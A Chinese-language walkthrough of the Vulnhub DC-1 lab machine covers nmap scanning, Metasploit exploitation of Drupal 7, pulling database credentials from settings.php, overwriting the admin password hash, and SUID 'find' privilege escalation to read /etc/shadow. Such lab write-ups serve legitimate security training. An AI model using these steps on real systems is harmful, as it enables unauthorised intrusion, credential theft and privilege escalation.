Vulnhub靶机DC系列-DC1

admin 2022年4月13日23:02:02评论68 views字数 1931阅读6分26秒阅读模式

一、下载所需工具

  • 靶机:https://www.vulnhub.com/entry/dc-1-1,292/

  • nmap

  • msf

  • arp-scan

二、靶机建设

  1. 导入虚拟机

  2. 查看虚拟机的mac地址,选择网络适配器,高级查看


    Vulnhub靶机DC系列-DC1

三、信息收集

3.1查询DC-1靶机的IP地址

使用nmap查询,通过靶机mac地址找到对应IP

sudo nmap -sn 192.168.182.1/24

Vulnhub靶机DC系列-DC1

使用arp-scan查询靶机IP地址

arp-scan -l

Vulnhub靶机DC系列-DC1

3.2查询靶机服务信息

使用nmap查看服务器信息

nmap -sV 192.168.182.151

Vulnhub靶机DC系列-DC1

通过上图可以看到有三个服务

  1. ssh:专为远程登录会话和其他网络服务提供的安全性协议

  2. http:通过80端口向外提供web服务

  3. rpcbind:RPCBind是linux平台一种通用的RPC端口映射功能。

查看http服务访问IP

Vulnhub靶机DC系列-DC1

通过插件查询是一个# Drupal7的web站点

四、漏洞利用

使用msf进行利用

使用search搜索Drupal的利用模块

Vulnhub靶机DC系列-DC1

使用use选中要使用的模块

Vulnhub靶机DC系列-DC1

使用show options或options或info查看模块配置信息

Vulnhub靶机DC系列-DC1

一大堆东西比如这里显示的可利用的版本,注意下边的选项参数

Vulnhub靶机DC系列-DC1

这里有yes 的是必须设置的但是有默认值的你可以保持默认 这里设置攻击目标rhosts set rhosts http://192.168.182.151

Vulnhub靶机DC系列-DC1

然后你可以再次info查看配置信息保证没有遗漏 这边我就不查看了我直接run进行利用

Vulnhub靶机DC系列-DC1

当看到meterpreter表示已经成功 可以通过shell获取靶机shell

Vulnhub靶机DC系列-DC1

这里我输入了ls,但是没有终端的箭头指引很难受

python -c 'import pty; pty.spawn("/bin/bash")' 使用这条命令获取交互式shell

Vulnhub靶机DC系列-DC1

我这里直接在meterpreter中进行操作

Vulnhub靶机DC系列-DC1

发现存在flag1文件,cat查看

Vulnhub靶机DC系列-DC1

提示查看CMS的配置文件 通过百度查到Drupal 配置文件:/data/wwwroot/drupal/web/sites/default/settings.php 所以cat查看这个配置文件

Vulnhub靶机DC系列-DC1

文件内容中出现了flag2提示,配置文件中也显示了数据库的用户名以及登录密码的信息。 提示信息并不建议使用字典爆破,先利用找到的信息登录mysql数据库看是否有其他信息 这时候使用shell操作

Vulnhub靶机DC系列-DC1

连接数据库mysql -u dbuser -p

Vulnhub靶机DC系列-DC1 查看库:show databases;

Vulnhub靶机DC系列-DC1

选择库:use drupaldb 查看表:show tables;

Vulnhub靶机DC系列-DC1

查看users表中的数据:select * from users;

Vulnhub靶机DC系列-DC1

在drupaldb的users表中找到了admin的密码,尝试根据找到的这一串字符得到密码。搜索drupal CMS是如何生成密码的(一般是取hash(不可逆性)),所以想根据hash值来得到密码是不可能了,那么忘记密码怎么办呢?当然是想办法重置密码了。drupal中有一个文件password-hash.sh是用来计算密码对应的hash值的,也就是查到的那串字符也是这么来的。

Vulnhub靶机DC系列-DC1 这里遇到个小坑,需要到www目录下执行

Vulnhub靶机DC系列-DC1 重新进入到数据库替换admin的密码 登录数据库:mysql -u dbuser -p 修改数据: update 表名 set 列名 = 新列值 where 列名 = 旧列值

update users set pass = '$S$DkiZXjbSg27VQPlWyNx7XJBaXW8fNaACXiACcxhr2xGwn5WF/L0C' where name = 'admin';

Vulnhub靶机DC系列-DC1 替换成功 登录到后台

Vulnhub靶机DC系列-DC1

在content中发现flag3

Vulnhub靶机DC系列-DC1 Vulnhub靶机DC系列-DC1

这里提示去shadow文件中查找用户的密码,(shadow文件一般是需要root权限的)。

首先提权:find / -user root -perm -4000 -print 2>/dev/null

Vulnhub靶机DC系列-DC1 这个命令是找用户组为root,权限包括为4000对应的权限的文件,从根目录/开始 4000权限大概就是能将对应文件所在用户组的权限给其他用户组使用。

利用find来进行提取

先建立一个文件touch laela.txt find laela.txt -exec cat /etc/shadow ;

Vulnhub靶机DC系列-DC1

发现两个用户root和flag4 其中有一个用户为flag4。一般来说在home目录下每个用户会有一个以用户名命名的文件夹 进入可以查看到flag4.txt。由之前搜集到的信息可以得知开启了ssh服务,所以也可以尝试爆破密码再用ssh登录连接。

Vulnhub靶机DC系列-DC1

我这里只看到了fl后面时空的因为我按tab补全但是没显示不过可以执行 由于已经提权了所以查看root下的最后一个flag

Vulnhub靶机DC系列-DC1 这里需要注意需要在你新建文件提权的目录下执行

Vulnhub靶机DC系列-DC1

完成大功告成

五、总结

Vulnhub靶机DC系列-DC1




原文始发于微信公众号(衡阳信安):Vulnhub靶机DC系列-DC1

  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2022年4月13日23:02:02
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   Vulnhub靶机DC系列-DC1https://cn-sec.com/archives/677058.html

发表评论

匿名网友 填写信息